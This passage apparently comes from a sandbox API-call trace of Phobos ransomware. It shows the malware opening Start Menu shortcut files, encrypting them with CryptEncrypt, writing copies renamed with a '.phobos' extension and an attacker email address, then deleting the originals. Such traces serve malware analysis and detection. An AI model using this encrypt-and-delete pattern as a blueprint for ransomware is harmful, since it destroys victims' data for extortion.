dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0177.046] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0177.046] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0177.046] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Windows Firewall with Advanced Security.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\windows firewall with advanced security.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0177.047] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32968) returned 1 [0177.047] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0177.047] ReadFile (in: hFile=0x188, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x4fa, lpOverlapped=0x0) returned 1 [0177.054] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x500, dwBufLen=0x500 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x500) returned 1 [0177.054] WriteFile (in: hFile=0x190, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x500, lpOverlapped=0x0) returned 1 [0177.055] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32d68) returned 1 [0177.055] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0177.055] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x80, dwBufLen=0x80 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x80) returned 1 [0177.055] CryptDestroyKey (hKey=0xa32d68) returned 1 [0177.055] WriteFile (in: hFile=0x190, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x132, lpOverlapped=0x0) returned 1 [0177.055] CryptDestroyKey (hKey=0xa32968) returned 1 [0177.055] CloseHandle (hObject=0x188) returned 1 [0177.055] CloseHandle (hObject=0x190) returned 1 [0177.056] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Windows Firewall with Advanced Security.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\windows firewall with advanced security.lnk")) returned 1 [0177.057] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0177.057] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Adobe Reader X.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\adobe reader x.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0177.059] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=2441) returned 1 [0177.059] CloseHandle (hObject=0x190) returned 1 [0177.060] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Adobe Reader X.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\adobe reader x.lnk")) returned 0x20 [0177.060] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Adobe Reader X.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\adobe reader x.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.060] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Adobe Reader X.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\adobe reader x.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0177.060] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0177.060] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0177.060] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Adobe Reader X.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\adobe reader x.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0177.064] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32968) returned 1 [0177.064] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0177.064] ReadFile (in: hFile=0x190, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x989, lpOverlapped=0x0) returned 1 [0177.075] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x990, dwBufLen=0x990 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x990) returned 1 [0177.076] WriteFile (in: hFile=0x188, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x990, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x990, lpOverlapped=0x0) returned 1 [0177.076] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32ca8) returned 1 [0177.076] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0177.076] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0177.076] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0177.076] WriteFile (in: hFile=0x188, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0177.076] CryptDestroyKey (hKey=0xa32968) returned 1 [0177.077] CloseHandle (hObject=0x190) returned 1 [0177.077] CloseHandle (hObject=0x188) returned 1 [0177.077] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Adobe Reader X.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\adobe reader x.lnk")) returned 1 [0177.078] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0177.078] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Google Chrome.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\google chrome.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0177.079] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=2269) returned 1 [0177.079] CloseHandle (hObject=0x134) returned 1 [0177.079] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Google Chrome.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\google chrome.lnk")) returned 0x20 [0177.079] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Google Chrome.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\google chrome.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.079] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Google Chrome.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\google chrome.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0177.079] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0177.079] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0177.079] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Google Chrome.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\google chrome.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0177.080] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32da8) returned 1 [0177.080] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0177.080] ReadFile (in: hFile=0x134, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x8dd, lpOverlapped=0x0) returned 1 [0177.090] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x8e0, dwBufLen=0x8e0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x8e0) returned 1 [0177.090] WriteFile (in: hFile=0x188, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x8e0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x8e0, lpOverlapped=0x0) returned 1 [0177.091] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32ca8) returned 1 [0177.091] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0177.091] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0177.091] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0177.091] WriteFile (in: hFile=0x188, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0177.091] CryptDestroyKey (hKey=0xa32da8) returned 1 [0177.091] CloseHandle (hObject=0x134) returned 1 [0177.092] CloseHandle (hObject=0x188) returned 1 [0177.092] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Google Chrome.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\google chrome.lnk")) returned 1 [0177.093] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0177.093] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\Check For Updates.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\java\\check for updates.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0177.094] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=2017) returned 1 [0177.094] CloseHandle (hObject=0x188) returned 1 [0177.094] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\Check For Updates.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\java\\check for updates.lnk")) returned 0x20 [0177.094] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\Check For Updates.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\java\\check for updates.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.094] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\Check For Updates.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\java\\check for updates.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0177.094] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0177.094] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0177.094] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\Check For Updates.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\java\\check for updates.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0177.095] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32da8) returned 1 [0177.095] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0177.095] ReadFile (in: hFile=0x188, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x7e1, lpOverlapped=0x0) returned 1 [0177.103] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x7f0, dwBufLen=0x7f0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x7f0) returned 1 [0177.103] WriteFile (in: hFile=0x134, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x7f0, lpOverlapped=0x0) returned 1 [0177.104] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32ca8) returned 1 [0177.104] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0177.104] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0177.104] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0177.104] WriteFile (in: hFile=0x134, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0177.104] CryptDestroyKey (hKey=0xa32da8) returned 1 [0177.104] CloseHandle (hObject=0x188) returned 1 [0177.104] CloseHandle (hObject=0x134) returned 1 [0177.105] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\Check For Updates.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\java\\check for updates.lnk")) returned 1 [0177.106] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0177.106] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\Get Help.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\java\\get help.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0177.107] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1206) returned 1 [0177.107] CloseHandle (hObject=0x134) returned 1 [0177.107] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\Get Help.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\java\\get help.lnk")) returned 0x20 [0177.107] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\Get Help.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\java\\get help.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.107] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\Get Help.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\java\\get help.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0177.107] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0177.107] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0177.107] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\Get Help.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\java\\get help.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0177.108] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32da8) returned 1 [0177.108] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0177.108] ReadFile (in: hFile=0x134, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x4b6, lpOverlapped=0x0) returned 1 [0177.116] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x4c0, dwBufLen=0x4c0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x4c0) returned 1 [0177.116] WriteFile (in: hFile=0x188, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x4c0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x4c0, lpOverlapped=0x0) returned 1 [0177.117] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32ca8) returned 1 [0177.117] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0177.117] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0177.117] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0177.117] WriteFile (in: hFile=0x188, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0177.117] CryptDestroyKey (hKey=0xa32da8) returned 1 [0177.117] CloseHandle (hObject=0x134) returned 1 [0177.117] CloseHandle (hObject=0x188) returned 1 [0177.118] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\Get Help.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\java\\get help.lnk")) returned 1 [0177.119] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0177.119] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Backup and Restore Center.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\maintenance\\backup and restore center.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0177.120] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1304) returned 1 [0177.120] CloseHandle (hObject=0x188) returned 1 [0177.120] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Backup and Restore Center.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\maintenance\\backup and restore center.lnk")) returned 0x20 [0177.120] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Backup and Restore Center.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\maintenance\\backup and restore center.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.120] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Backup and Restore Center.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\maintenance\\backup and restore center.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0177.120] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0177.120] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0177.120] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Backup and Restore Center.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\maintenance\\backup and restore center.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0177.121] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32da8) returned 1 [0177.121] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0177.121] ReadFile (in: hFile=0x188, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x518, lpOverlapped=0x0) returned 1 [0177.130] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x520, dwBufLen=0x520 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x520) returned 1 [0177.130] WriteFile (in: hFile=0x134, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x520, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x520, lpOverlapped=0x0) returned 1 [0177.131] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32ca8) returned 1 [0177.131] CryptSetKeyParam 